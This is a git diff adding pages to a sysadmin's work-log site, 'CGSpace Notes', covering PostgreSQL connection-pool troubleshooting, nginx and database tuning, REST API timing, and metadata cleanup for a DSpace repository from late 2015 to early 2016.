diff --git a/content/posts/2023-07.md b/content/posts/2023-07.md index 20257a3e9..9814fd779 100644 --- a/content/posts/2023-07.md +++ b/content/posts/2023-07.md @@ -10,4 +10,22 @@ categories: ["Notes"] - Export CGSpace to check for missing Initiative collection mappings - Start harvesting on AReS +## 2023-07-02 + +- Minor edits to the `crossref_doi_lookup.py` script while running some checks from 22,000 CGSpace DOIs + +## 2023-07-03 + +- I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect + - I took the more accurate ones from Crossref and updated the items on CGSpace + - I took a few hundred ISBNs as well for where we were missing them + - I also tagged ~4,700 items with missing licenses as "Copyrighted; all rights reserved" based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer + - Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it's usually copyrighted (could still be open access, but we can't tell via Crossref) + - I would be curious to write a script to check the Unpaywall API for open access status... + - In the past I found that their *license* status was not very accurate, but the open access status might be more reliable +- More minor work on the DSpace 7 item views + - I learned some new Angular template syntax + - I created a custom component to show Creative Commons licenses on the simple item page + - I also decided that I don't like the Impact Area icons as a component because they don't have any visual meaning + diff --git a/docs/.gitignore b/docs/.gitignore new file mode 100644 index 000000000..e69de29bb diff --git a/docs/2015-11/index.html b/docs/2015-11/index.html new file mode 100644 index 000000000..5fd198598 --- /dev/null +++ b/docs/2015-11/index.html @@ -0,0 +1,296 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + November, 2015 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

November, 2015

+ +
+

2015-11-22

+
    +
  • CGSpace went down
  • +
  • Looks like DSpace exhausted its PostgreSQL connection pool
  • +
  • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+78
+
    +
  • For now I have increased the limit from 60 to 90, run updates, and rebooted the server
  • +
+

2015-11-24

+
    +
  • CGSpace went down again
  • +
  • Getting emails from uptimeRobot and uptimeButler that it’s down, and Google Webmaster Tools is sending emails that there is an increase in crawl errors
  • +
  • Looks like there are still a bunch of idle PostgreSQL connections:
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+96
+
    +
  • For some reason the number of idle connections is very high since we upgraded to DSpace 5
  • +
+

2015-11-25

+
    +
  • Troubleshoot the DSpace 5 OAI breakage caused by nginx routing config
  • +
  • The OAI application requests stylesheets and javascript files with the path /oai/static/css, which gets matched here:
  • +
+
# static assets we can load from the file system directly with nginx
+location ~ /(themes|static|aspects/ReportingSuite) {
+    try_files $uri @tomcat;
+...
+
    +
  • The document root is relative to the xmlui app, so this gets a 404—I’m not sure why it doesn’t pass to @tomcat
  • +
  • Anyways, I can’t find any URIs with path /static, and the more important point is to handle all the static theme assets, so we can just remove static from the regex for now (who cares if we can’t use nginx to send Etags for OAI CSS!)
  • +
  • Also, I noticed we aren’t setting CSP headers on the static assets: in nginx, add_header directives are only inherited by a child block if that block defines no add_header of its own, so using add_header in a child block drops the headers set in the parent
  • +
  • We simply need to add include extra-security.conf; to the above location block (but research and test first)
  • +
  • We should add WOFF assets to the list of things to set expires for:
  • +
+
location ~* \.(?:ico|css|js|gif|jpe?g|png|woff)$ {
+
    +
  • We should also add aspects/Statistics to the location block for static assets (minus static from above):
  • +
+
location ~ /(themes|aspects/ReportingSuite|aspects/Statistics) {
+
    +
  • Need to check /about on CGSpace, as it’s blank on my local test server and we might need to add something there
  • +
  • CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+93
+
    +
  • I looked closer at the idle connections and saw that many have been idle for hours (current time on server is 2015-11-25T20:20:42+0000):
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | less -S
+datid | datname  |  pid  | usesysid | usename  | application_name | client_addr | client_hostname | client_port |         backend_start         |          xact_start           |
+-------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
+20951 | cgspace  | 10966 |    18205 | cgspace  |                  | 127.0.0.1   |                 |       37731 | 2015-11-25 13:13:02.837624+00 |                               | 20
+20951 | cgspace  | 10967 |    18205 | cgspace  |                  | 127.0.0.1   |                 |       37737 | 2015-11-25 13:13:03.069421+00 |                               | 20
+...
+
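    +
  • A more targeted query (a sketch, using the state and state_change columns available since PostgreSQL 9.2) would list only the connections that have been idle for more than an hour:
  • +
+
$ psql -c "SELECT pid, usename, now() - state_change AS idle_for FROM pg_stat_activity WHERE datname = 'cgspace' AND state = 'idle' AND now() - state_change > interval '1 hour' ORDER BY idle_for DESC;"
+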
    +
  • There is a relevant Jira issue about this: https://jira.duraspace.org/browse/DS-1458
  • +
  • It seems there is some sense in changing DSpace’s default db.maxidle from unlimited (-1) to something like 8 (Tomcat default) or 10 (Confluence default)
  • +
  • Change db.maxidle from -1 to 10, reduce db.maxconnections from 90 to 50, and restart postgres and tomcat7
  • +
  • Also redeploy DSpace Test with a clean sync of CGSpace and mirror these database settings there as well
  • +
  • Also deploy the nginx fixes for the try_files location block as well as the expires block
  • +
+
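    +
  • For reference, those pool settings live in dspace.cfg, so after this change the relevant lines would look something like this (a sketch):
  • +
+
db.maxconnections = 50
+db.maxidle = 10
+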

2015-11-26

+
    +
  • CGSpace behaving much better since changing db.maxidle yesterday, but still two up/down notices from monitoring this morning (better than 50!)
  • +
  • CCAFS colleagues mentioned that the REST API is very slow, 24 seconds for one item
  • +
  • Not as bad for me, but still unsustainable if you have to get many:
  • +
+
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+8.415
+
    +
  • Monitoring e-mailed in the evening to say CGSpace was down
  • +
  • Idle connections in PostgreSQL again:
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+66
+
    +
  • At the time, the current DSpace pool size was 50…
  • +
  • I reduced the pool back to the default of 30, and reduced the db.maxidle setting from 10 to 8
  • +
+

2015-11-29

+
    +
  • Still more alerts that CGSpace has been up and down all day
  • +
  • Current database settings for DSpace:
  • +
+
db.maxconnections = 30
+db.maxwait = 5000
+db.maxidle = 8
+db.statementpool = true
+
    +
  • And idle connections:
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+49
+
    +
  • Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace’s thirst can ever be quenched
  • +
  • On another note, SUNScholar’s notes suggest adjusting some other postgres variables: http://wiki.lib.sun.ac.za/index.php/SUNScholar/Optimisations/Database
  • +
  • This might help with REST API speed (which I mentioned above and still need to do real tests)
  • +
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2015-12/index.html b/docs/2015-12/index.html new file mode 100644 index 000000000..34206b97d --- /dev/null +++ b/docs/2015-12/index.html @@ -0,0 +1,318 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + December, 2015 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

December, 2015

+ +
+

2015-12-02

+
    +
  • Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less space:
  • +
+
# cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+
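    +
  • Existing .lzo archives can be re-compressed to xz with something like this (a sketch; lzop -dc decompresses to stdout):
  • +
+
$ lzop -dc dspace.log.2015-11-18.lzo | xz > dspace.log.2015-11-18.xz
+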
    +
  • I had used lrzip once, but it needs more memory and is harder to use as it requires the lrztar wrapper
  • +
  • Need to remember to go check if everything is ok in a few days and then change CGSpace
  • +
  • CGSpace went down again (due to PostgreSQL idle connections of course)
  • +
  • Current database settings for DSpace are db.maxconnections = 30 and db.maxidle = 8, yet idle connections are exceeding this:
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+39
+
    +
  • I restarted PostgreSQL and Tomcat and it’s back
  • +
  • On a related note of why CGSpace is so slow, I decided to finally try the pgtune script to tune the postgres settings:
  • +
+
# apt-get install pgtune
+# pgtune -i /etc/postgresql/9.3/main/postgresql.conf -o postgresql.conf-pgtune
+# mv /etc/postgresql/9.3/main/postgresql.conf /etc/postgresql/9.3/main/postgresql.conf.orig 
+# mv postgresql.conf-pgtune /etc/postgresql/9.3/main/postgresql.conf
+
    +
  • It introduced the following new settings:
  • +
+
default_statistics_target = 50
+maintenance_work_mem = 480MB
+constraint_exclusion = on
+checkpoint_completion_target = 0.9
+effective_cache_size = 5632MB
+work_mem = 48MB
+wal_buffers = 8MB
+checkpoint_segments = 16
+shared_buffers = 1920MB
+max_connections = 80
+
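    +
  • One way to confirm which of these values are actually in effect after restarting PostgreSQL is to query pg_settings (a sketch):
  • +
+
$ psql -c "SELECT name, setting, unit FROM pg_settings WHERE name IN ('shared_buffers', 'work_mem', 'effective_cache_size', 'max_connections');"
+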
    +
  • Now I need to go read PostgreSQL docs about these options, and watch memory settings in munin etc
  • +
  • For what it’s worth, now the REST API should be faster (because of these PostgreSQL tweaks):
  • +
+
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.474
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+2.141
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.685
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.995
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.786
+
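    +
  • A shell loop makes it easier to repeat that timing test several times in a row (a sketch around the same curl command):
  • +
+
$ for i in $(seq 1 5); do curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all; done
+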
+

CCAFS item

+
    +
  • The authorizations for the item are all public READ, and I don’t see any errors in dspace.log when browsing that item
  • +
  • I filed a ticket on Atmire’s issue tracker
  • +
  • I also filed a ticket on Atmire’s issue tracker for the PostgreSQL stuff
  • +
+

2015-12-03

+
    +
  • CGSpace very slow, and monitoring emailing me to say it’s down, even though I can load the page (very slowly)
  • +
  • Idle postgres connections look like this (with no change in DSpace db settings lately):
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+29
+
    +
  • I restarted Tomcat and postgres…
  • +
  • Atmire commented that we should raise the JVM heap size by ~500M, so it is now -Xms3584m -Xmx3584m
  • +
  • We weren’t out of heap yet, but it’s probably fair enough that the DSpace 5 upgrade (and new Atmire modules) requires more memory so it’s ok
  • +
  • A possible side effect is that I see that the REST API is twice as fast for the request above now:
  • +
+
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.368
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.968
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+1.006
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.849
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.806
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.854
+

2015-12-05

+
    +
  • CGSpace has been up and down all day and REST API is completely unresponsive
  • +
  • PostgreSQL idle connections are currently:
  • +
+
postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+28
+
    +
  • I have reverted all the pgtune tweaks from the other day, as they didn’t fix the stability issues, so I’d rather not have them introducing more variables into the equation
  • +
  • The PostgreSQL stats from Munin all point to something database-related with the DSpace 5 upgrade around mid–late November
  • +
+

PostgreSQL bgwriter (year) +PostgreSQL cache (year) +PostgreSQL locks (year) +PostgreSQL scans (year)

+

2015-12-07

+
    +
  • Atmire sent some fixes to DSpace’s REST API code that was leaving contexts open (causing the slow performance and database issues)
  • +
  • After deploying the fix to CGSpace the REST API is consistently faster:
  • +
+
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.675
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.599
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.588
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.566
+$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
+0.497
+

2015-12-08

+
    +
  • Switch CGSpace log compression cron jobs from using lzop to xz—the compression is much better (as the comparison on 2015-12-02 showed), though xz is slower and uses more CPU
  • +
  • Since we figured out (and fixed) the cause of the performance issue, I reverted Google Bot’s crawl rate to the “Let Google optimize” setting
  • +
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2015/12/ccafs-item-no-metadata.png b/docs/2015/12/ccafs-item-no-metadata.png new file mode 100644 index 000000000..552b50d12 Binary files /dev/null and b/docs/2015/12/ccafs-item-no-metadata.png differ diff --git a/docs/2015/12/postgres_bgwriter-year.png b/docs/2015/12/postgres_bgwriter-year.png new file mode 100644 index 000000000..918447914 Binary files /dev/null and b/docs/2015/12/postgres_bgwriter-year.png differ diff --git a/docs/2015/12/postgres_cache_cgspace-year.png b/docs/2015/12/postgres_cache_cgspace-year.png new file mode 100644 index 000000000..890b5132a Binary files /dev/null and b/docs/2015/12/postgres_cache_cgspace-year.png differ diff --git a/docs/2015/12/postgres_connections_cgspace-year.png b/docs/2015/12/postgres_connections_cgspace-year.png new file mode 100644 index 000000000..faecf8692 Binary files /dev/null and b/docs/2015/12/postgres_connections_cgspace-year.png differ diff --git a/docs/2015/12/postgres_locks_cgspace-year.png b/docs/2015/12/postgres_locks_cgspace-year.png new file mode 100644 index 000000000..63624da00 Binary files /dev/null and b/docs/2015/12/postgres_locks_cgspace-year.png differ diff --git a/docs/2015/12/postgres_scans_cgspace-year.png b/docs/2015/12/postgres_scans_cgspace-year.png new file mode 100644 index 000000000..84e5f93be Binary files /dev/null and b/docs/2015/12/postgres_scans_cgspace-year.png differ diff --git a/docs/2016-01/index.html b/docs/2016-01/index.html new file mode 100644 index 000000000..ac8a941b0 --- /dev/null +++ b/docs/2016-01/index.html @@ -0,0 +1,254 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + January, 2016 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

January, 2016

+ +
+

2016-01-13

+
    +
  • Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_collections.sh script I wrote last year.
  • +
  • I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
  • +
  • Update GitHub wiki for documentation of maintenance tasks.
  • +
+

2016-01-14

+
    +
  • Update CCAFS project identifiers in input-forms.xml
  • +
  • Run system updates and restart the server
  • +
+

2016-01-18

+
    +
  • Change “Extension material” to “Extension Material” in input-forms.xml (a mistake that fell through the cracks when we fixed the others in DSpace 4 era)
  • +
+

2016-01-19

+
    +
  • Work on tweaks and updates for the social sharing icons on item pages: add Delicious and Mendeley (from Academicons), make links open in new windows, and set the icon color to the theme’s primary color (#157)
  • +
  • Tweak date-based facets to show more values in drill-down ranges (#162)
  • +
  • Need to remember to clear the Cocoon cache after deployment or else you don’t see the new ranges immediately
  • +
  • Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account
  • +
  • Altmetric’s support for Handles is kinda weak, so they can’t associate our items with DOIs until they are tweeted or blogged about, etc. first
  • +
+

2016-01-21

+
    +
  • Still waiting for my IFTTT recipe to fire, two days later
  • +
  • It looks like the Atom feed on CGSpace hasn’t changed in two days, but there have definitely been new items
  • +
  • The RSS feed is nearly as old, but has different old items there
  • +
  • On a hunch I cleared the Cocoon cache and now the feeds are fresh
  • +
  • Looks like there is a configuration option related to this, webui.feed.cache.age, which defaults to 48 hours, though I’m not sure what relation it has to the Cocoon cache
  • +
  • In any case, we should change this cache to be something more like 6 hours, as we publish new items several times per day.
  • +
  • Work around a CSS issue with long URLs in the item view (#172)
  • +
+
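    +
  • For reference, that would be a one-line change in dspace.cfg, something like this (a sketch, assuming the value is interpreted as hours):
  • +
+
webui.feed.cache.age = 6
+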

2016-01-25

+
    +
  • Re-deploy CGSpace and DSpace Test with latest 5_x-prod branch
  • +
  • This included the social icon fixes/updates, date-based facet tweaks, reducing the feed cache age, and fixing a layout issue in XMLUI item view when an item had long URLs
  • +
+

2016-01-26

+
    +
  • Run nginx updates on CGSpace and DSpace Test (1.8.1 and 1.9.10, respectively)
  • +
  • Run updates on DSpace Test and reboot for new Linode kernel Linux 4.4.0-x86_64-linode63 (first update in months)
  • +
+

2016-01-28

+
    +
  • Start looking at importing some Bioversity data that had been prepared earlier this week
  • +
  • While checking the data I noticed something strange: there are 79 items but only 8 unique PDFs:
  • +
+
$ ls SimpleArchiveForBio/ | wc -l
+79
+$ find SimpleArchiveForBio/ -iname "*.pdf" -exec basename {} \; | sort -u | wc -l
+8
+

2016-01-29

+
    +
  • Add five missing center-specific subjects to XMLUI item view (#174)
  • +
  • This CCAFS item, before:
  • +
+

XMLUI subjects before

+
    +
  • After:
  • +
+

XMLUI subjects after

+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2016-02/index.html b/docs/2016-02/index.html new file mode 100644 index 000000000..7e244ef26 --- /dev/null +++ b/docs/2016-02/index.html @@ -0,0 +1,432 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + February, 2016 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

February, 2016

+ +
+

2016-02-05

+
    +
  • Looking at some DAGRIS data for Abenet Yabowork
  • +
  • Lots of issues with spaces, newlines, etc causing the import to fail
  • +
  • I noticed we have a very interesting list of countries on CGSpace:
  • +
+

CGSpace country list

+
    +
  • Not only are there 49,000 countries, we have some blanks (25)…
  • +
  • Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE”
  • +
+

2016-02-06

+
    +
  • Found a way to get items with null/empty metadata values from SQL
  • +
  • First, find the metadata_field_id for the field you want from the metadatafieldregistry table:
  • +
+
dspacetest=# select * from metadatafieldregistry;
+
    +
  • In this case our country field is 78
  • +
  • Now find all resources with type 2 (item) that have null/empty values for that field:
  • +
+
dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
+
    +
  • Then you can find the handle that owns it from its resource_id:
  • +
+
dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
+
    +
  • It’s 25 items so editing in the web UI is annoying, let’s try SQL!
  • +
+
dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
+DELETE 25
+
    +
  • After that perhaps a regular dspace index-discovery (no -b) should suffice…
  • +
  • Hmm, I indexed, cleared the Cocoon cache, and restarted Tomcat but the 25 “|||” countries are still there
  • +
  • Maybe I need to do a full re-index…
  • +
  • Yep! The full re-index seems to work.
  • +
  • Process the empty countries on CGSpace
  • +
+
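    +
  • For reference, the full re-index command (path as on my local setup):
  • +
+
$ ~/dspace/bin/dspace index-discovery -b
+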

2016-02-07

+
    +
  • Working on cleaning up Abenet’s DAGRIS data with OpenRefine
  • +
  • I discovered two really nice functions in OpenRefine: value.trim() and value.escape("javascript") which shows whitespace characters like \r\n!
  • +
  • For some reason when you import an Excel file into OpenRefine it exports dates like 1949 to 1949.0 in the CSV
  • +
  • I re-import the resulting CSV and run a GREL on the date issued column: value.replace("\.0", "")
  • +
  • I need to start running DSpace in Mac OS X instead of a Linux VM
  • +
  • Install PostgreSQL from homebrew, then configure and import CGSpace database dump:
  • +
+
$ postgres -D /opt/brew/var/postgres
+$ createuser --superuser postgres
+$ createuser --pwprompt dspacetest
+$ createdb -O dspacetest --encoding=UNICODE dspacetest
+$ psql postgres
+postgres=# alter user dspacetest createuser;
+postgres=# \q
+$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-02-07.backup 
+$ psql postgres
+postgres=# alter user dspacetest nocreateuser;
+postgres=# \q
+$ vacuumdb dspacetest
+$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
+
    +
  • After building and running a fresh_install I symlinked the webapps into Tomcat’s webapps folder:
  • +
+
$ mv /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT.orig
+$ ln -sfv ~/dspace/webapps/xmlui /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT
+$ ln -sfv ~/dspace/webapps/rest /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/rest
+$ ln -sfv ~/dspace/webapps/jspui /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/jspui
+$ ln -sfv ~/dspace/webapps/oai /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/oai
+$ ln -sfv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/solr
+$ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
+
    +
  • Add CATALINA_OPTS in /opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh, as this script is sourced by the catalina startup script
  • +
  • For example:
  • +
+
CATALINA_OPTS="-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8"
+
    +
  • After verifying that the site is working, start a full index:
  • +
+
$ ~/dspace/bin/dspace index-discovery -b
+

2016-02-08

+
    +
  • Finish cleaning up and importing ~400 DAGRIS items into CGSpace
  • +
  • Whip up some quick CSS to make the button in the submission workflow use the XMLUI theme’s brand colors (#154)
  • +
+

ILRI submission buttons +Drylands submission buttons

+

2016-02-09

+
    +
  • Re-sync DSpace Test with CGSpace
  • +
  • Help Sisay with OpenRefine
  • +
  • Enable HTTPS on DSpace Test using Let’s Encrypt:
  • +
+
$ cd ~/src/git
+$ git clone https://github.com/letsencrypt/letsencrypt
+$ cd letsencrypt
+$ sudo service nginx stop
+# add port 443 to firewall rules
+$ ./letsencrypt-auto certonly --standalone -d dspacetest.cgiar.org
+$ sudo service nginx start
+$ ansible-playbook dspace.yml -l linode02 -t nginx,firewall -u aorth --ask-become-pass
+
    +
  • We should install it in /opt/letsencrypt and then script the renewal, but first we have to wire up some variables and template stuff based on the script here: https://letsencrypt.org/howitworks/
  • +
  • I had to export some CIAT items that were being cleaned up on the test server and I noticed their dc.contributor.author fields have DSpace 5 authority index UUIDs…
  • +
  • To clean those up in OpenRefine I used this GREL expression: value.replace(/::\w{8}-\w{4}-\w{4}-\w{4}-\w{12}::600/,"")
  • +
  • Getting more and more hangs on DSpace Test, seemingly random but also during CSV import
  • +
  • Logs don’t always show anything right when it fails, but eventually one of these appears:
  • +
+
org.dspace.discovery.SearchServiceException: Error while processing facet fields: java.lang.OutOfMemoryError: Java heap space
+
    +
  • or
  • +
+
Caused by: java.util.NoSuchElementException: Timeout waiting for idle object
+
    +
  • Right now DSpace Test’s Tomcat heap is set to 1536m and we have quite a bit of free RAM:
  • +
+
# free -m
+             total       used       free     shared    buffers     cached
+Mem:          3950       3902         48          9         37       1311
+-/+ buffers/cache:       2552       1397
+Swap:          255         57        198
+
    +
  • So I’ll bump up the Tomcat heap to 2048 (CGSpace production server is using 3GB)
  • +
+

2016-02-11

+
    +
  • Massaging some CIAT data in OpenRefine
  • +
  • There are 1200 records that have PDFs, and will need to be imported into CGSpace
  • +
  • I created a filename column based on the dc.identifier.url column using the following transform:
  • +
+
value.split('/')[-1]
+
    +
  • Then I wrote a tool called generate-thumbnails.py to download the PDFs and generate thumbnails for them, for example:
  • +
+
$ ./generate-thumbnails.py ciat-reports.csv
+Processing 64661.pdf
+> Downloading 64661.pdf
+> Creating thumbnail for 64661.pdf
+Processing 64195.pdf
+> Downloading 64195.pdf
+> Creating thumbnail for 64195.pdf
+
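    +
  • The core of that script is basically just a download followed by a thumbnail conversion; a rough shell equivalent would be something like this (a sketch, with a hypothetical URL, using the same GraphicsMagick options as elsewhere in these notes):
  • +
+
$ curl -s -L -o 64661.pdf "http://ciat.cgiar.org/some/path/64661.pdf"
+$ gm convert -quality 82 -thumbnail x300 -flatten 64661.pdf\[0\] 64661.jpg
+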

2016-02-12

+
    +
  • Looking at CIAT’s records again, there are some problems with a dozen or so files (out of 1200)
  • +
  • A few items are using the same exact PDF
  • +
  • A few items are using HTM or DOC files
  • +
  • A few items link to PDFs on IFPRI’s e-Library or Research Gate
  • +
  • A few items have no item
  • +
  • Also, I’m not sure: if we import these items, will we remove the dc.identifier.url field from the records?
  • +
+

2016-02-12

+
    +
  • Looking at CIAT’s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I’m not sure if we can use those
  • +
  • 265 items have dirty, URL-encoded filenames:
  • +
+
$ ls | grep -c -E "%"
+265
+
    +
  • I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames
  • +
  • This python2 snippet seems to work in the CLI, but not so well in OpenRefine:
  • +
+
$ python -c "import urllib, sys; print urllib.unquote(sys.argv[1])" CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
+CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
+
    +
  • Merge pull requests for submission form theming (#178) and missing center subjects in XMLUI item views (#176)
  • +
  • They will be deployed on CGSpace the next time I re-deploy
  • +
+

2016-02-16

+
    +
  • Turns out OpenRefine has an unescape function!
  • +
+
value.unescape("url")
+
    +
  • This turns the URLs into human-readable versions that we can use as proper filenames
  • +
  • Run web server and system updates on DSpace Test and reboot
  • +
  • To merge dc.identifier.url and dc.identifier.url[], rename the second column so it doesn’t have the brackets, like dc.identifier.url2
  • +
  • Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with “||” in between
  • +
  • Work on Python script for parsing and downloading PDF records from dc.identifier.url
  • +
  • To get filenames from dc.identifier.url, create a new column based on this transform: forEach(value.split('||'), v, v.split('/')[-1]).join('||')
  • +
  • This also works for records that have multiple URLs (separated by “||”)
  • +
+

2016-02-17

+
    +
  • Re-deploy CGSpace, run all system updates, and reboot
  • +
  • More work on CIAT data, cleaning and doing a last metadata-only import into DSpace Test
  • +
  • SAFBuilder has a bug preventing it from processing filenames containing more than one underscore
  • +
  • Need to re-process the filename column to replace multiple underscores with one: value.replace(/_{2,}/, "_")
  • +
+

2016-02-20

+
    +
  • Turns out the “bug” in SAFBuilder isn’t a bug, it’s a feature that allows you to encode extra information like the destination bundle in the filename
  • +
  • Also, it seems DSpace’s SAF import tool doesn’t like importing filenames that have accents in them:
  • +
+
java.io.FileNotFoundException: /usr/share/tomcat7/SimpleArchiveFormat/item_1021/CIAT_COLOMBIA_000075_Medición_de_palatabilidad_en_forrajes.pdf (No such file or directory)
+
    +
  • Need to rename files to have no accents or umlauts, etc…
  • +
  • Useful custom text facet for URLs ending with “.pdf”: value.endsWith(".pdf")
  • +
+

2016-02-22

+
    +
  • To change Spanish accents to ASCII in OpenRefine:
  • +
+
value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
+
    +
  • But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac
  • +
  • On closer inspection, I can import files with the following names on Linux (DSpace Test):
  • +
+
Bitstream: tést.pdf
+Bitstream: tést señora.pdf
+Bitstream: tést señora alimentación.pdf
+
    +
  • Seems it could be something with the HFS+ filesystem actually, as it’s not UTF-8 (it’s something like UCS-2)
  • +
  • HFS+ normalizes filenames to a decomposed Unicode form, so an accented character is stored as base character + combining accent, whereas Linux’s ext4 just stores the bytes it is given (usually the precomposed form)
  • +
  • Running the SAFBuilder on Mac OS X works if you’re going to import the resulting bundle on Mac OS X, but if your DSpace is running on Linux you need to run the SAFBuilder there where the filesystem’s encoding matches
  • +
+
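    +
  • If files do end up with decomposed (NFD) names on Linux, one way to normalize them to NFC is a small python2 one-liner in a shell loop (a sketch, untested):
  • +
+
$ for f in *.pdf; do nfc=$(python -c "import sys, unicodedata; print unicodedata.normalize('NFC', sys.argv[1].decode('utf-8')).encode('utf-8')" "$f"); [ "$f" = "$nfc" ] || mv -n "$f" "$nfc"; done
+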

2016-02-29

+
    +
